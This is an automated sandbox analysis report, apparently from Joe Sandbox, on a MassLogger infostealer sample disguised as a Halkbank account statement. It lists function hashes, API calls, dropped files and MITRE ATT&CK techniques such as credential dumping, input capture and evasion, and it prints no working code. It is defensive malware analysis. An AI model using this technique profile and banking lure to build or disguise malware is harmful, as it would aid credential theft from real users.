ResumeThread.KERNELBASE ref: 0767428A

Memory Dump Source

Source File: 0000000A.00000002.2232299698.0000000007670000.00000040.00000800.00020000.00000000.sdmp, Offset: 07670000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7670000_bAZAANr.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: b853272c64e42de72e4002359c3df632a880967f4f0161225d7d44a855df49e9
Instruction ID: feb46a48d658b1f5264c2cb33b23da7975685011029d7e9b4d7771b0b62413eb
Opcode Fuzzy Hash: b853272c64e42de72e4002359c3df632a880967f4f0161225d7d44a855df49e9
Instruction Fuzzy Hash: 391158B5D002498FCB20DFAAC4457EEFFF8EF89324F208419D429A7240CB39A540CBA4

Function 07674228 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNELBASE ref: 0767428A

Memory Dump Source

Source File: 0000000A.00000002.2232299698.0000000007670000.00000040.00000800.00020000.00000000.sdmp, Offset: 07670000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7670000_bAZAANr.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: 588c0487da59d34c857061747e509462ac4e56bca30d508d5d650f3bb838f81c
Instruction ID: 91dcd41546da1f0cca27d6f6ae8bbfb6402f2ecccac2b02ac09deb7cddfe0312
Opcode Fuzzy Hash: 588c0487da59d34c857061747e509462ac4e56bca30d508d5d650f3bb838f81c
Instruction Fuzzy Hash: EA1125B19002498FCB20DFAAC4457AEFBF9EF89324F208419D519A7240CB79A944CBA4

Function 00EFB038 Relevance: 1.5, APIs: 1, Instructions: 47COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 00EFB09E

Memory Dump Source

Source File: 0000000A.00000002.2226067349.0000000000EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_ef0000_bAZAANr.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 2b77c3ba9af1903cf9ec081971733a28919e719f1dd5b15b1e8de0202a264859
Instruction ID: d317f30c4e30f4644baeec46124ec24217fe8b5367e959e06d7a0d076cf4bcc5
Opcode Fuzzy Hash: 2b77c3ba9af1903cf9ec081971733a28919e719f1dd5b15b1e8de0202a264859
Instruction Fuzzy Hash: F811DFB5C006498FCB10DF9AC444A9EFBF8AB89314F10841AD929B7250D379A645CFA5

Function 07677D30 Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,00000010,00000000,?), ref: 07677D95

Memory Dump Source

Source File: 0000000A.00000002.2232299698.0000000007670000.00000040.00000800.00020000.00000000.sdmp, Offset: 07670000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7670000_bAZAANr.jbxd

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: 37f61c8773a89b4392a6b3b829c44939df0e4cb2c590927ece705eea0ad1b699
Instruction ID: 510719e8c9a37696d57072c685b53feaad466ad599f2a9ac37e11147700efd31
Opcode Fuzzy Hash: 37f61c8773a89b4392a6b3b829c44939df0e4cb2c590927ece705eea0ad1b699
Instruction Fuzzy Hash: 4F11D6B58003499FDB10DF99D485BDEBFF8FB59324F108419E519A7600C375A544CFA1

Function 07672D90 Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,00000010,00000000,?), ref: 07677D95

Memory Dump Source

Source File: 0000000A.00000002.2232299698.0000000007670000.00000040.00000800.00020000.00000000.sdmp, Offset: 07670000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7670000_bAZAANr.jbxd

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: e46b6cf80bf191b12c5e118dbbf6cb55becec82cdc6d2d7fbcda379ec8593913
Instruction ID: 6b9f7d26a9af88bf8b7ade716648ed47c221c165329f67aa01dc37d08d4d8b5b
Opcode Fuzzy Hash: e46b6cf80bf191b12c5e118dbbf6cb55becec82cdc6d2d7fbcda379ec8593913
Instruction Fuzzy Hash: 9D1103B5800349DFDB10DF9AC485BEEBBF8FB59320F108819E519A7200C379A944CFA1

Function 00B8D3D8 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2224031597.0000000000B8D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B8D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_b8d000_bAZAANr.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a0f2ef774f6a1d15a04e8ebda7c539c65c1a2877826f30084494134e618b79c9
Instruction ID: d7e813263e7579ff69c07e28a878b574f55ad3e7cbd87c0b2b6509f11c23e170
Opcode Fuzzy Hash: a0f2ef774f6a1d15a04e8ebda7c539c65c1a2877826f30084494134e618b79c9
Instruction Fuzzy Hash: AE210A71504204DFDB05EF14D9C0F16BFA5FB98324F28C5AAD9090B3A6C33AE856D7A2

Function 00BAD01C Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2224402136.0000000000BAD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BAD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_bad000_bAZAANr.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ef70ca2851f71a5133c32347c9e7f15d7da3529a443b6f5268a9a47dea688fe2
Instruction ID: eff49fffa30d6cf41ae87b146dd37947e36621e36e40b4bd36967efb60652c6f
Opcode Fuzzy Hash: ef70ca2851f71a5133c32347c9e7f15d7da3529a443b6f5268a9a47dea688fe2
Instruction Fuzzy Hash: 8B21F271608204DFCB24DF24D9D4B26BFA5FB89314F20C5ADD94A4B696C33AD807CA61

Function 00BAD1D4 Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2224402136.0000000000BAD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BAD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_bad000_bAZAANr.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8331c839963fb6d6f2e0bd8c87bb31a0786d8a332b8baeb73b38d94578bc8c43
Instruction ID: c848d6b452d025359c6a2c0db689c1f4b2925d14815c411b9c5b92abba289861
Opcode Fuzzy Hash: 8331c839963fb6d6f2e0bd8c87bb31a0786d8a332b8baeb73b38d94578bc8c43
Instruction Fuzzy Hash: B9210471608304EFDB05DF24D9C0F26BBA5FB89314F20C5ADE90A4B696C33AD806CA61

Function 00BAD006 Relevance: .1, Instructions: 60COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2224402136.0000000000BAD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BAD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_bad000_bAZAANr.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5733e3eca8a29fa10c9803b95199349ef25cd05ff657ac3a976f41fd1175dcb2
Instruction ID: 4708b0af4a2130720381ad75ac8aeeb6fcf444bceeff7f6079d8b8ec41e57e4b
Opcode Fuzzy Hash: 5733e3eca8a29fa10c9803b95199349ef25cd05ff657ac3a976f41fd1175dcb2
Instruction Fuzzy Hash: 302184755093808FDB16CF24D594715BFB1EB46314F28C5DAD8498B697C33AD80ACB62

Function 00B8D3D3 Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2224031597.0000000000B8D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B8D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_b8d000_bAZAANr.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: be84e5d2ba6eb25d2e30d29f2c5ffdc4cdcd384a79140dda988d9b090738847a
Instruction ID: d7ff80cac3b4cbb8fa0610f865cf53177a28017da094b987c2669b5679272ca2
Opcode Fuzzy Hash: be84e5d2ba6eb25d2e30d29f2c5ffdc4cdcd384a79140dda988d9b090738847a
Instruction Fuzzy Hash: 43110672504240DFCB02DF00D5C4B16BFB1FB94314F28C6AAD9090B366C33AD45ACBA1

Function 00BAD1CF Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2224402136.0000000000BAD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BAD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_bad000_bAZAANr.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 945d3a080ad63b5e32bcc5b18ec1e97d0272151c1fb78e482730898ede984437
Instruction ID: 3f987c55742dddc642ccde5cec8584f1eeb0b034def6ca6e4324491dc3d654f4
Opcode Fuzzy Hash: 945d3a080ad63b5e32bcc5b18ec1e97d0272151c1fb78e482730898ede984437
Instruction Fuzzy Hash: CE118B75508380DFDB16CF14D5C4B15BBA1FB85314F24C6A9D84A4B6A6C33AD84ACB62

Function 00B8D745 Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2224031597.0000000000B8D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B8D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_b8d000_bAZAANr.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: eaf5b6537313f23133ad65ae552fcb5760d05d978f0827a36153c8079e422d06
Instruction ID: eb03a8b56eb1cd777b8fb1a3277e3d2b00c0b7e5b127284faafce5b9d9c221ce
Opcode Fuzzy Hash: eaf5b6537313f23133ad65ae552fcb5760d05d978f0827a36153c8079e422d06
Instruction Fuzzy Hash: EE01F7750053449EE720AB15CDC4B66BFDCEF45320F18C5ABED180A2E6C2399C01CB71

Function 00B8D744 Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2224031597.0000000000B8D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B8D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_b8d000_bAZAANr.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8861f369503b36475a78343e76c365ccb49ee9482c1ea496c888274783cac2fd
Instruction ID: 771b1928b147f84dc08911cd829a076497d9cc8215ab26f85f1cb18634221f0c
Opcode Fuzzy Hash: 8861f369503b36475a78343e76c365ccb49ee9482c1ea496c888274783cac2fd
Instruction Fuzzy Hash: C5F0C2750053449EE7109F16C888B66FFD8EF91334F18C45AED080B296C2799C40CBB0

Analysis Process: bAZAANr.exePID: 7480, Parent PID: 3668COMMON

Execution Graph

Execution Coverage:	17.2%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	34
Total number of Limit Nodes:	3

Executed Functions

Function 0289C168 Relevance: 2.0, APIs: 1, Instructions: 528
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 0000000F.00000002.4555731649.0000000002890000.00000040.00000800.00020000.00000000.sdmp, Offset: 02890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_2890000_bAZAANr.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c63f4d0244423de8545a17dced8413cf25dc120b5b69d4d996e01dc8f6df7ed8
Instruction ID: 5dde69080f029624979c688cb6f96e91311983bf33d6f80f04a494df1ccbcbfd
Opcode Fuzzy Hash: c63f4d0244423de8545a17dced8413cf25dc120b5b69d4d996e01dc8f6df7ed8
Instruction Fuzzy Hash: C2223A78E00219CFDF14DFA8C884B9DBBB2BF88304F5485AAD409AB355DB359986CF50

Function 0289C76C Relevance: 1.6, APIs: 1, Instructions: 62
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL(00000000), ref: 0289C8AE

Memory Dump Source

Source File: 0000000F.00000002.4555731649.0000000002890000.00000040.00000800.00020000.00000000.sdmp, Offset: 02890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_2890000_bAZAANr.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 079923779d4e4a96772487605b907510931ce25b8c652033d69a56418f540d7a
Instruction ID: 6ca44d4446884029e15ecde6dc29cbf0038c3b6c7437a219588d145e522da89e
Opcode Fuzzy Hash: 079923779d4e4a96772487605b907510931ce25b8c652033d69a56418f540d7a
Instruction Fuzzy Hash: 4E113ABCE011099FDF04DBA9D884AADBBB5FF8C309F588166E804E7246D731E941CB61

Function 00D5D005 Relevance: .1, Instructions: 78COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.4554773142.0000000000D5D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D5D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_d5d000_bAZAANr.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 25d7d76e9ffda7b80691a84cb306d88b0609b06f862432a617c9a0077a995b0c
Instruction ID: 860c3e9adfec0a2b7c4602bc4d6957f3ba808436d294135897396072d5fb2887
Opcode Fuzzy Hash: 25d7d76e9ffda7b80691a84cb306d88b0609b06f862432a617c9a0077a995b0c
Instruction Fuzzy Hash: 6F313C7550D3C49FCB138B24D990711BF75AB46214F29C5EBD9898F2A7C23A980ACB72

Function 00D5D030 Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.4554773142.0000000000D5D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D5D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_d5d000_bAZAANr.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8dc900fcfccd5103d63f9e6e883face089222a409871d62de683c5f12dad32bd
Instruction ID: dd08649af7b12a3bccba3fdfa50dd02b15626e2980de761548f51d8172659a71
Opcode Fuzzy Hash: 8dc900fcfccd5103d63f9e6e883face089222a409871d62de683c5f12dad32bd
Instruction Fuzzy Hash: CF21D071504204DFDF24DF18D980B26BBA6EB84315F24C569ED4A4A296C33AD84BCA72

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Container: Container Creation, File: File Creation, File: File Modification, Process: Process Creation, Scheduled Job: Scheduled Job Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify file time attributes to hide new or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder. This is done, for example, on files that have been modified or created by the adversary so that they do not appear conspicuous to forensic investigators or file analysis tools.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata, File: File Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	Driver: Driver Load, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report Halkbank_Ekstre_20241022_081224_563756.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: MassLogger

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Persistence and Installation Behavior

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Location Tracking

Compliance

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Halkbank_Ekstre_20241022_081224_563756.exe.log

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\bAZAANr.exe.log

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_142fxk0j.umy.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4spchqge.hrw.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_czultcis.eod.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_gtciswzl.v5s.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_h1ju5ih4.n5h.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_i43rkmla.x5m.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ljruqizx.5re.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_oilutxhm.dll.ps1

C:\Users\user\AppData\Local\Temp\tmpD8B4.tmp

Windows Analysis Report
Halkbank_Ekstre_20241022_081224_563756.exe

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre